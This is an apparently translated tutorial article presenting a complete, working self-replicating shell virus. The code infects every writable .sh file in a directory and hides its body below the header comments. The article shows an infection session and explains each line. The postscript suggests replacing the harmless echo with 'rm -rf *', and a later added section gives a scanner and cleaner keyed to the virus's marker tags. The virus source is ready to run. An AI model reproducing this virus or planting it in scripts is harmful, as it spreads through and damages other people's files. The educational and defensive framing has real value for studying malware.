Introduction to Shell Virus
Author: Watercloud   email: Watercloud@xfocus.org   homepage: http://watercloud_at_xfocus.org
1. Introduction
Viruses have always had a slightly mysterious flavor to them. I still remember the pain of writing my first DOS virus: from the first line to a working program it took me more than three months, and the code was a mess. Recently it struck me that the thing I admired back then, a program that infects other files and spreads itself, is not hard at all to write with the shell, so I wrote this small script, whose only function is to infect other shell programs.
The program is of little use in practice, but it is quite helpful for understanding how a virus works, and that is where its real value lies.
2. Program code
#!/bin/sh
#File name: Virus_Demo.sh
#Purpose: SHELL virus demonstration.
#Description: the virus infects every file ending in .sh in the current directory, but never infects a file twice.
#Written by: Watercloud@xfocus.org
#Date: 2003-5-13

#B:<!A%C&T:>
vfile=$_;vtmp=/tmp/.vtmp.$$
for f in ./*.sh;do
if [ ! -w $f -o ! -r $vfile ];then continue;fi
if grep '<!A%C&T:>' $f;then continue;fi
if sed -n '1p' $f|grep 'csh';then continue;fi
cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
vno=`awk '$0 ~ /(^[ \t]*#)|(^[ \t]*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
sed -n "1,${vno}p" $vtmp > $f
(sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
vno=`expr $vno + 1`;sed -n "${vno},\$p" $vtmp >> $f
rm -f $vtmp
done > /dev/null 2>&1
unset vtmp;unset vfile;unset vno
echo "Hi, Here is a demo shell virus in your script!"
#E:<!A%C&T:>
#EOF
This shows how powerful the shell is: a program this short can infect other program files.
3. Demonstration
Let's test it:
First put two files in the current directory: the virus file, and a file that will be infected.
[cloud@/export/home/cloud/vir]> ls -l
drwxr-xr-x   2 cloud  staff   512  6月  4 17:43 ./
drwxr-xr-x  10 cloud  staff  1024  6月  4 17:41 ../
-rwxr--r--   1 cloud  staff    89  6月  4 17:43 test.sh
-rwxr--r--   1 cloud  staff   773  6月  4 17:42 virus_demo.sh
Let's take a look at our "broiler" script; it is very simple:
[cloud@/export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# author: foo
# Date: 3000-1-1
ls -l
#EOF
Now I infect it:
[cloud@/export/home/cloud/vir]> ./virus_demo.sh
Hi, Here is a demo shell virus in your script!
Let's see the result after infection:
[cloud@/export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# author: foo
# Date: 3000-1-1
#B:<!A%C&T:>
vfile=$_;vtmp=/tmp/.vtmp.$$
for f in ./*.sh;do
if [ ! -w $f -o ! -r $vfile ];then continue;fi
if grep '<!A%C&T:>' $f;then continue;fi
if sed -n '1p' $f|grep 'csh';then continue;fi
cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
vno=`awk '$0 ~ /(^[ \t]*#)|(^[ \t]*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
sed -n "1,${vno}p" $vtmp > $f
(sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
vno=`expr $vno + 1`;sed -n "${vno},\$p" $vtmp >> $f
rm -f $vtmp
done > /dev/null 2>&1
unset vtmp;unset vfile;unset vno
echo "Hi, Here is a demo shell virus in your script!"
#E:<!A%C&T:>

ls -l
#EOF
Look: the virus body, everything from #B:<!A%C&T:> to #E:<!A%C&T:>, has spread into test.sh. It is worth noting where it was inserted: right at the beginning of the effective code of the original test.sh. The reason is that shell programs usually open with a block of comments, and you cannot push someone else's header comments down below the virus; that would be far too obvious.
Now let's run the newly infected file and see:
[cloud@/export/home/cloud/vir]> ./test.sh
Hi, Here is a demo shell virus in your script!    <- this line is printed from inside the virus body
-rwxr-xr-x   1 cloud  staff   724  6月  4 17:44 test.sh
-rwxr-xr-x   1 cloud  staff   773  6月  4 17:42 virus_demo.sh
4. Simple explanation
Let's analyze this virus step by step:
#B:<!A%C&T:>
Start tag of the virus body; the virus uses it to locate its own body when copying itself.
vfile=$_;vtmp=/tmp/.vtmp.$$
Defines two variables: the name of a temporary file, and the name of the current program taken from $_. This is also why this line must be the first command of the program: anywhere else, $_ would no longer hold the program name, and the virus would not know where to copy itself from.
for f in ./*.sh;do
Starts the loop over every file in the current directory whose name ends in .sh.
if [ ! -w $f -o ! -r $vfile ];then continue;fi
Skip the target unless it is writable and the virus source file is readable.
if grep '<!A%C&T:>' $f;then continue;fi
If the target already carries the tag, it has been infected before. Giving it a second dose would be a bit much, wouldn't it?
if sed -n '1p' $f|grep 'csh';then continue;fi
If the first line of the target points at csh, give up: csh syntax is too different.
cp -f $f $vtmp;if [ $? -ne 0 ];then continue;fi
Ready to infect. First make a backup copy of the target; if the copy fails, of course we give up.
vno=`awk '$0 ~ /(^[ \t]*#)|(^[ \t]*$)/ && v==NR-1 {v++} END{print 0+v}' $vtmp`
What is this? It looks complicated, but you cannot study shell viruses without understanding awk and regular expressions. It counts the run of comment and blank lines at the start of the program (v is only incremented while every line so far has matched), and that count is the point where the virus will be inserted.
sed -n "1,${vno}p" $vtmp > $f
One sed command copies those leading lines from the backup file back into the target.
(sed -n '/^#B:<!A%C&T:>/,/^#E:<!A%C&T:>/p' $vfile;echo) >> $f
Another sed copies the virus body, from the #B tag through the #E tag, out of the virus source file and appends it, followed by an empty line, to the target.
vno=`expr $vno + 1`;sed -n "${vno},\$p" $vtmp >> $f
The last sed appends the remaining part of the target file from the backup. sed really is powerful!
rm -f $vtmp
Clean up the temporary file.
done > /dev/null 2>&1
End of the loop; all of its output is discarded.
unset vtmp;unset vfile;unset vno
Clean up the crime scene.
echo "Hi, Here is a demo shell virus in your script!"
Infection done, and this line also tells everyone that the program has been infected by a virus.
#E:<!A%C&T:>
End tag of the virus body, used when the program copies itself.
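The tags the virus relies on to avoid double infection also make it easy to find and remove. As an added example that is not part of the original article, the following sh script scans a directory for scripts carrying the marker pair and cuts the inserted body back out (the function names are my own; the infected sample in demo() is constructed to match the article's test.sh layout):

```shell
#!/bin/sh
# Added example, not code from the original article: find scripts that carry the
# demo virus's marker pair and cut the inserted body back out. Assumes POSIX sh
# with grep, awk, find and cmp; the infected sample in demo() is constructed.

VB='#B:<!A%C&T:>'   # start marker the demo virus wraps its body in
VE='#E:<!A%C&T:>'   # end marker

# shellvirus_check FILE: succeed only when FILE contains both markers.
shellvirus_check() {
    grep -qF "$VB" "$1" && grep -qF "$VE" "$1"
}

# shellvirus_scan DIR: print every regular *.sh file under DIR that is marked.
shellvirus_scan() {
    find "$1" -type f -name '*.sh' | while read -r f; do
        if shellvirus_check "$f"; then printf '%s\n' "$f"; fi
    done
}

# shellvirus_clean FILE: delete the lines from the start marker through the end
# marker, plus the single empty line the virus's trailing "echo" leaves after it,
# so the original script comes back byte for byte. Untouched when not infected.
shellvirus_clean() {
    f=$1; shellvirus_check "$f" || return 1
    t=$(mktemp) || return 1
    awk -v vb="$VB" -v ve="$VE" '
        $0 == vb         { skip = 1; next }
        skip && $0 == ve { skip = 0; drop = 1; next }
        skip             { next }
        drop             { drop = 0; if ($0 == "") next }
                         { print }' "$f" > "$t" || { rm -f "$t"; return 1; }
    cat "$t" > "$f"      # write back through cat so owner and mode bits are kept
    rm -f "$t"
}

# demo: build a constructed infected copy of the article's test.sh layout, clean
# it and return 0 when the result matches the original. Prints the scan result.
demo() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n# Just a demo for virus test\nls -l\n#EOF\n' > "$d/orig.sh"
    { sed -n '1,2p' "$d/orig.sh"; printf '%s\nvfile=$_\n%s\n\n' "$VB" "$VE"
      sed -n '3,$p' "$d/orig.sh"; } > "$d/test.sh"
    shellvirus_scan "$d"
    shellvirus_clean "$d/test.sh" && cmp -s "$d/orig.sh" "$d/test.sh"
    r=$?; rm -rf "$d"; return $r
}
```

Run `demo` to see the scan report and verify the round trip; in a real cleanup, run shellvirus_scan on a copy first and keep the backups, since a script that legitimately contains the tag strings would also be matched.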
5. Postscript
From this we can see that a script virus is very simple: you don't need much knowledge to write one, and yet the damage it can do is not small. Just imagine the echo line replaced by rm -rf *. At the same time it shows the power of the shell; compare this with how much effort it takes to handle the PE or ELF file structure.
The program above has been tested on Linux and Solaris; on Windows it should also work under Cygwin.
Finally, I want to stress that this article is written to share with everyone, not to teach anyone to write a virus and harm others. Remember that!
#EOF
#Game Over
echo "Hope the ax!"